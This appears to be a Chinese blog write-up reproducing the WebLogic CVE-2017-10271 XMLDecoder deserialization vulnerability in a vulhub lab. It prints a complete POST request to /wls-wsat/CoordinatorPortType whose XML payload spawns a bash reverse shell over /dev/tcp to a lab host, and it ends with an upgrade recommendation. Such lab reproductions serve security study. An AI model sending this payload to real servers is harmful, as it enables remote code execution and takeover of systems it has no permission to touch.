Post

Weblogic(CVE-2017-10271)漏洞复现

Posted
By 2 min read

应用介绍

WebLogic 是美国Oracle公司出品的一个 application server,确切的说是一个基于JAVAEE 架构的中间件,WebLogic 是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java 应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。

来源百度百科

漏洞介绍

wls-wsat XMLDecoder 反序列化漏洞

漏洞危害

RCE

漏洞原理

Weblogic的 WLS Security 组件对外提供 webservice 服务,其中使用了 XMLDecoder 来解析用户传入的 XML 数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。

环境搭建

照例使用 vulhub 上的靶机环境进行复现。

计算机 IP
Kali 192.168.174.128
Ubuntu 192.168.174.141
Victim(Docker) 192.168.80.2

等待一段时间,访问http://192.168.174.141:7001/即可看到一个404页面,说明 weblogic 已成功启动。

1

漏洞复现

访问 http://192.168.174.141:7001/wls-wsat/CoordinatorPortType ,如下图所示则存在漏洞。

2

在 BP 上重放改请求,修改请求方法为 POST,并且添加请求包,完整请求内容为:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.174.141:7001
Cache-Control: max-age=0
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ADMINCONSOLESESSION=mFc1h6VB4xdhTXcVtqJNZ78gjPJJZ4MVJm4RWqKvlwMv2TB2Cwj8!1626974212
Connection: close
Content-Type: text/xml
Content-Length: 640

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/192.168.174.141/8888 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

注意添加 Content-Type 请求头,并且需要将反弹 shell 语句中的特殊字符进行编码,虽然响应请求码是 500 ,但仍能反弹成功。

3

漏洞验证

具体代码查看这里

修复建议

升级最新版本。

总结

  1. 已运行的 docker 容器添加额外监听端口

Ref.

漏洞复现
Weblogic CVE-2017-10271
This post is licensed under CC BY 4.0 by the author.